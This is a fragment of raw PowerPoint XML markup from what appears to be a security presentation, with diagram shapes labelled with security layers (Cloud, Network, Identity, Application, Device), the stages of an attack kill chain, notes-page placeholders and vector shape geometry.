          <a:off x="2470978" y="0"/>
          <a:ext cx="1235489" cy="1012620"/>
        </a:xfrm>
        <a:prstGeom prst="trapezoid">
          <a:avLst>
            <a:gd name="adj" fmla="val 61005"/>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Cloud</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2470978" y="0"/>
        <a:ext cx="1235489" cy="1012620"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{157F157C-A849-4602-8EAA-AD9B8C7869E7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1853233" y="1012620"/>
          <a:ext cx="2470978" cy="1012620"/>
        </a:xfrm>
        <a:prstGeom prst="trapezoid">
          <a:avLst>
            <a:gd name="adj" fmla="val 61005"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent5">
            <a:hueOff val="1594494"/>
            <a:satOff val="2193"/>
            <a:lumOff val="411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Network</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="3100" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2285654" y="1012620"/>
        <a:ext cx="1606135" cy="1012620"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{069A4CCB-0042-449E-93DF-C616384F7430}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1235489" y="2025241"/>
          <a:ext cx="3706467" cy="1012620"/>
        </a:xfrm>
        <a:prstGeom prst="trapezoid">
          <a:avLst>
            <a:gd name="adj" fmla="val 61005"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent5">
            <a:hueOff val="3188988"/>
            <a:satOff val="4386"/>
            <a:lumOff val="82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Identity</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1884120" y="2025241"/>
        <a:ext cx="2409203" cy="1012620"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0BFBAE14-3039-40F4-83DD-3723C4812F57}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="617744" y="3037861"/>
          <a:ext cx="4941956" cy="1012620"/>
        </a:xfrm>
        <a:prstGeom prst="trapezoid">
          <a:avLst>
            <a:gd name="adj" fmla="val 61005"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent5">
            <a:hueOff val="4783482"/>
            <a:satOff val="6580"/>
            <a:lumOff val="123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Application</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1482586" y="3037861"/>
        <a:ext cx="3212271" cy="1012620"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3F00AB0B-DA30-4443-A403-0B1A85A14553}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="4050482"/>
          <a:ext cx="6177444" cy="1012620"/>
        </a:xfrm>
        <a:prstGeom prst="trapezoid">
          <a:avLst>
            <a:gd name="adj" fmla="val 61005"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent5">
            <a:hueOff val="6377976"/>
            <a:satOff val="8773"/>
            <a:lumOff val="1646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Device</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="3100" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1081052" y="4050482"/>
        <a:ext cx="4015339" cy="1012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C459B-8B96-499D-9275-7BAB340E5118}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="196628"/>
          <a:ext cx="1610870" cy="644348"/>
        </a:xfrm>
        <a:prstGeom prst="chevron">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:srgbClr val="505050"/>
        </a:solidFill>
        <a:ln w="10795" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:srgbClr val="505050">
              <a:shade val="50000"/>
            </a:srgb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Reconnaissance</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="322174" y="196628"/>
        <a:ext cx="966522" cy="644348"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{414FA506-5C56-444D-B0A9-1B8F7989D9D0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1449783" y="196628"/>
          <a:ext cx="1610870" cy="644348"/>
        </a:xfrm>
        <a:prstGeom prst="chevron">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:srgbClr val="505050"/>
        </a:solidFill>
        <a:ln w="10795" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:srgbClr val="505050">
              <a:shade val="50000"/>
            </a:srgb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Weaponization</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1771957" y="196628"/>
        <a:ext cx="966522" cy="644348"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C1FC703B-9AA1-4234-8EE4-8C7EAEBA9873}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2899566" y="196628"/>
          <a:ext cx="1610870" cy="644348"/>
        </a:xfrm>
        <a:prstGeom prst="chevron">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:srgbClr val="505050"/>
        </a:solidFill>
        <a:ln w="10795" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:srgbClr val="505050">
              <a:shade val="50000"/>
            </a:srgb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Delivery</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3221740" y="196628"/>
        <a:ext cx="966522" cy="644348"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B4776655-5682-4618-995A-AE28AE427452}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4349349" y="196628"/>
          <a:ext cx="1610870" cy="644348"/>
        </a:xfrm>
        <a:prstGeom prst="chevron">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Exploitation</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4671523" y="196628"/>
        <a:ext cx="966522" cy="644348"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{25EDC683-A133-4396-BE21-B5595EBF9F7B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5799132" y="196628"/>
          <a:ext cx="1610870" cy="644348"/>
        </a:xfrm>
        <a:prstGeom prst="chevron">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Installation</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6121306" y="196628"/>
        <a:ext cx="966522" cy="644348"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{11B4B22A-DE7B-47AC-8873-62E8BC82FD14}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7248915" y="196628"/>
          <a:ext cx="1610870" cy="644348"/>
        </a:xfrm>
        <a:prstGeom prst="chevron">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:srgbClr val="68217A"/>
        </a:solidFill>
        <a:ln w="17145" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:shade val="95000"/>
              <a:alpha val="50000"/>
              <a:satMod val="150000"/>
            </a:srgb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C2</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7571089" y="196628"/>
        <a:ext cx="966522" cy="644348"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C3A69038-0147-4BAF-BB50-8D7B8431FC72}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8698698" y="196628"/>
          <a:ext cx="1610870" cy="644348"/>
        </a:xfrm>
        <a:prstGeom prst="chevron">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:srgbClr val="68217A"/>
        </a:solidFill>
        <a:ln w="17145" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:shade val="95000"/>
              <a:alpha val="50000"/>
              <a:satMod val="150000"/>
            </a:srgb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Actions on Intent</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="9020872" y="196628"/>
        <a:ext cx="966522" cy="64434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884"/>
            <a:ext cx="3077739" cy="469424"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="94229" tIns="47114" rIns="94229" bIns="47114"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8C8D045D-9A66-44E7-900A-FC6D0BD4E54A}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>9/30/2023 4:14 AM</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Footer Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="8917422"/>
            <a:ext cx="6001591" cy="341322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="94229" tIns="47114" rIns="94229" bIns="47114" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="410616" defTabSz="94197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9753" y="8917422"/>
            <a:ext cx="1111078" cy="469424"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="94229" tIns="47114" rIns="94229" bIns="47114"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4229" tIns="47114" rIns="94229" bIns="47114" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Footer Placeholder 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="8919051"/>
            <a:ext cx="6131803" cy="365481"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="94229" tIns="47114" rIns="94229" bIns="47114" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr marL="588931" indent="0" algn="l">
              <a:defRPr sz="1200"/>
            </a:lvl1p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atin typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{38EEC551-8CDA-4EB6-89BB-2A86C9F091C8}" type="datetime8">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9/30/2023 4:13 AM</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Notes Placeholder 11"/>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19966" y="8917422"/>
            <a:ext cx="980865" cy="469424"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="94229" tIns="47114" rIns="94229" bIns="47114"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191">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1191">
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{7D10C09F-FCA1-48C8-B40D-42E1045D109E}" type="datetime8">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr defTabSz="961191">
                <a:defRPr/>
              </a:pPr>
              <a:t>9/30/2023 4:13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rPr>
              <a:pPr defTabSz="961191">
                <a:defRPr/>
              </a:pPr>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2210882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705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42308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50662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4173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08179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FD1965-8645-4509-B2DB-8BA2885C5652}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>27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1134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0367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2255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3229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61434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185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97903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9/30/2023 4:14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94345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bg>
      <p:bgPr>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="0">
              <a:srgbClr val="1978CF"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="74" name="Group 73">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB099F9C-CBF0-C297-3AD1-DFE84B9D580E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5847220" y="379148"/>
            <a:ext cx="6589255" cy="6615377"/>
            <a:chOff x="5847220" y="379148"/>
            <a:chExt cx="6589255" cy="6615377"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="66" name="Freeform: Shape 65">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5639EC0-1003-A20F-59F6-989FD6BEAEE7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5847220" y="379148"/>
              <a:ext cx="6589255" cy="6615377"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 4508128 w 5539415"/>
                <a:gd name="connsiteY0" fmla="*/ 40 h 5047586"/>
                <a:gd name="connsiteX1" fmla="*/ 5539415 w 5539415"/>
                <a:gd name="connsiteY1" fmla="*/ 1020065 h 5047586"/>
                <a:gd name="connsiteX2" fmla="*/ 5539415 w 5539415"/>
                <a:gd name="connsiteY2" fmla="*/ 5047586 h 5047586"/>
                <a:gd name="connsiteX3" fmla="*/ 4664574 w 5539415"/>
                <a:gd name="connsiteY3" fmla="*/ 5047586 h 5047586"/>
                <a:gd name="connsiteX4" fmla="*/ 4664574 w 5539415"/>
                <a:gd name="connsiteY4" fmla="*/ 1021313 h 5047586"/>
                <a:gd name="connsiteX5" fmla="*/ 4504372 w 5539415"/>
                <a:gd name="connsiteY5" fmla="*/ 876135 h 5047586"/>
                <a:gd name="connsiteX6" fmla="*/ 4372958 w 5539415"/>
                <a:gd name="connsiteY6" fmla="*/ 1025069 h 5047586"/>
                <a:gd name="connsiteX7" fmla="*/ 4372958 w 5539415"/>
                <a:gd name="connsiteY7" fmla="*/ 5047586 h 5047586"/>
                <a:gd name="connsiteX8" fmla="*/ 3498117 w 5539415"/>
                <a:gd name="connsiteY8" fmla="*/ 5047586 h 5047586"/>
                <a:gd name="connsiteX9" fmla="*/ 3498117 w 5539415"/>
                <a:gd name="connsiteY9" fmla="*/ 1033829 h 5047586"/>
                <a:gd name="connsiteX10" fmla="*/ 4508128 w 5539415"/>
                <a:gd name="connsiteY10" fmla="*/ 40 h 5047586"/>
                <a:gd name="connsiteX11" fmla="*/ 2196490 w 5539415"/>
                <a:gd name="connsiteY11" fmla="*/ 40 h 5047586"/>
                <a:gd name="connsiteX12" fmla="*/ 3206501 w 5539415"/>
                <a:gd name="connsiteY12" fmla="*/ 1033829 h 5047586"/>
                <a:gd name="connsiteX13" fmla="*/ 3206501 w 5539415"/>
                <a:gd name="connsiteY13" fmla="*/ 5047586 h 5047586"/>
                <a:gd name="connsiteX14" fmla="*/ 2332914 w 5539415"/>
                <a:gd name="connsiteY14" fmla="*/ 5047586 h 5047586"/>
                <a:gd name="connsiteX15" fmla="*/ 2332914 w 5539415"/>
                <a:gd name="connsiteY15" fmla="*/ 1021313 h 5047586"/>
                <a:gd name="connsiteX16" fmla="*/ 2172712 w 5539415"/>
                <a:gd name="connsiteY16" fmla="*/ 876135 h 5047586"/>
                <a:gd name="connsiteX17" fmla="*/ 2041298 w 5539415"/>
                <a:gd name="connsiteY17" fmla="*/ 1025069 h 5047586"/>
                <a:gd name="connsiteX18" fmla="*/ 2041298 w 5539415"/>
                <a:gd name="connsiteY18" fmla="*/ 5047586 h 5047586"/>
                <a:gd name="connsiteX19" fmla="*/ 1166457 w 5539415"/>
                <a:gd name="connsiteY19" fmla="*/ 5047586 h 5047586"/>
                <a:gd name="connsiteX20" fmla="*/ 1166457 w 5539415"/>
                <a:gd name="connsiteY20" fmla="*/ 1020065 h 5047586"/>
                <a:gd name="connsiteX21" fmla="*/ 2196490 w 5539415"/>
                <a:gd name="connsiteY21" fmla="*/ 40 h 5047586"/>
                <a:gd name="connsiteX22" fmla="*/ 436794 w 5539415"/>
                <a:gd name="connsiteY22" fmla="*/ 40 h 5047586"/>
                <a:gd name="connsiteX23" fmla="*/ 874841 w 5539415"/>
                <a:gd name="connsiteY23" fmla="*/ 436834 h 5047586"/>
                <a:gd name="connsiteX24" fmla="*/ 874841 w 5539415"/>
                <a:gd name="connsiteY24" fmla="*/ 5047586 h 5047586"/>
                <a:gd name="connsiteX25" fmla="*/ 0 w 5539415"/>
                <a:gd name="connsiteY25" fmla="*/ 5047586 h 5047586"/>
                <a:gd name="connsiteX26" fmla="*/ 0 w 5539415"/>
                <a:gd name="connsiteY26" fmla="*/ 436834 h 5047586"/>
                <a:gd name="connsiteX27" fmla="*/ 436794 w 5539415"/>
                <a:gd name="connsiteY27" fmla="*/ 40 h 504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39415" h="5047586">
                  <a:moveTo>
                    <a:pt x="4508128" y="40"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="5075081" y="-4964"/>
                    <a:pt x="5538161" y="454354"/>
                    <a:pt x="5539415" y="1020065"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="5539415" y="5047586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4664574" y="5047586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4664574" y="1021313"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="4664574" y="936208"/>
                    <a:pt x="4590731" y="867369"/>
                    <a:pt x="4504372" y="876135"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4429281" y="882393"/>
                    <a:pt x="4372958" y="948724"/>
                    <a:pt x="4372958" y="1025069"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="4372958" y="5047586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3498117" y="5047586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3498117" y="1033829"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3498117" y="471880"/>
                    <a:pt x="3946179" y="5044"/>
                    <a:pt x="4508128" y="40"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="2196490" y="40"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2758445" y="6298"/>
                    <a:pt x="3206501" y="471880"/>
                    <a:pt x="3206501" y="1033829"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3206501" y="5047586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2332914" y="5047586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2332914" y="1021313"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2332914" y="936208"/>
                    <a:pt x="2259071" y="867369"/>
                    <a:pt x="2172712" y="876135"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2097621" y="882393"/>
                    <a:pt x="2041298" y="948724"/>
                    <a:pt x="2041298" y="1025069"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2041298" y="5047586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1166457" y="5047586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1166457" y="1020065"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1166457" y="454354"/>
                    <a:pt x="1629537" y="-4964"/>
                    <a:pt x="2196490" y="40"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="436794" y="40"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="678345" y="40"/>
                    <a:pt x="873587" y="195283"/>
                    <a:pt x="874841" y="436834"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="874841" y="5047586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="5047586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="436834"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="195283"/>
                    <a:pt x="195243" y="40"/>
                    <a:pt x="436794" y="40"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="24000">
                  <a:srgbClr val="FFFFFF">
                    <a:alpha val="98000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="FFFFFF">
                    <a:alpha val="0"/>
                  </a:srgbClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
              <a:tileRect/>
            </a:gradFill>
            <a:ln w="2129" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr marR="0" lvl="0" indent="0" defTabSz="914400"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rgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56" name="Freeform: Shape 55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DE0DB18-D30B-6686-AF0D-CC0C41ECEA5B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7407445" y="1493803"/>
              <a:ext cx="729489" cy="729488"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 52330 w 104659"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 104659"/>
                <a:gd name="connsiteX1" fmla="*/ 104660 w 104659"/>
                <a:gd name="connsiteY1" fmla="*/ 52330 h 104659"/>
                <a:gd name="connsiteX2" fmla="*/ 52330 w 104659"/>
                <a:gd name="connsiteY2" fmla="*/ 104660 h 104659"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 104659"/>
                <a:gd name="connsiteY3" fmla="*/ 52330 h 104659"/>
                <a:gd name="connsiteX4" fmla="*/ 52330 w 104659"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 1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9" h="104659">
                  <a:moveTo>
                    <a:pt x="52330" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="81165" y="0"/>
                    <a:pt x="104660" y="23495"/>
                    <a:pt x="104660" y="52330"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104660" y="81165"/>
                    <a:pt x="81165" y="104660"/>
                    <a:pt x="52330" y="104660"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23495" y="104660"/>
                    <a:pt x="0" y="81165"/>
                    <a:pt x="0" y="52330"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="23495"/>
                    <a:pt x="23495" y="0"/>
                    <a:pt x="52330" y="0"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
            <a:ln w="21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Freeform: Shape 56">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{907724D7-DC22-B1E9-8C92-6AA3A0986586}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5997587" y="565292"/>
              <a:ext cx="729489" cy="729488"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 52330 w 104659"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 104659"/>
                <a:gd name="connsiteX1" fmla="*/ 104660 w 104659"/>
                <a:gd name="connsiteY1" fmla="*/ 52330 h 104659"/>
                <a:gd name="connsiteX2" fmla="*/ 52330 w 104659"/>
                <a:gd name="connsiteY2" fmla="*/ 104660 h 104659"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 104659"/>
                <a:gd name="connsiteY3" fmla="*/ 52330 h 104659"/>
                <a:gd name="connsiteX4" fmla="*/ 52330 w 104659"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 1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9" h="104659">
                  <a:moveTo>
                    <a:pt x="52330" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="81165" y="0"/>
                    <a:pt x="104660" y="23495"/>
                    <a:pt x="104660" y="52330"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104660" y="81165"/>
                    <a:pt x="81165" y="104660"/>
                    <a:pt x="52330" y="104660"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23495" y="104660"/>
                    <a:pt x="0" y="81165"/>
                    <a:pt x="0" y="52330"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="23495"/>
                    <a:pt x="23495" y="0"/>
                    <a:pt x="52330" y="0"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:ln w="2129" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr marR="0" lvl="0" indent="0" defTabSz="914400"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000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="59" name="Freeform: Shape 58">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1720FE6F-339A-E09A-8D64-6B2422C41FF9}"/>
                </a:ext>
              </a:extLst>
